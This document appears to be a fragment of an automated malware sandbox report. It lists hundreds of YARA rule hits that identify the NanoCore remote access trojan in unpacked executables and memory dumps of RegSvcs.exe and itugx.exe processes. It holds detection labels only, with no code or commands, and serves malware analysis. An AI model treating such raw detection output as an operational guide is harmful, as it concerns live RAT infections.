      Source: 19.2.RegSvcs.exe.41b07ce.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 3.2.RegSvcs.exe.37b4dd8.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 3.2.RegSvcs.exe.37b4dd8.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 3.2.RegSvcs.exe.37b4dd8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 3.2.RegSvcs.exe.37b9c38.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 3.2.RegSvcs.exe.37b9c38.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 3.2.RegSvcs.exe.37b9c38.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 19.2.RegSvcs.exe.31ce6d4.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 19.2.RegSvcs.exe.31ce6d4.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 19.2.RegSvcs.exe.31ce6d4.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 3.2.RegSvcs.exe.37b4dd8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 3.2.RegSvcs.exe.37b4dd8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 3.2.RegSvcs.exe.37b4dd8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 3.2.RegSvcs.exe.5e30000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 3.2.RegSvcs.exe.5e30000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 3.2.RegSvcs.exe.5e30000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 3.2.RegSvcs.exe.6040000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 3.2.RegSvcs.exe.6040000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 3.2.RegSvcs.exe.6040000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects NanoCore Author: ditekSHen
      Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
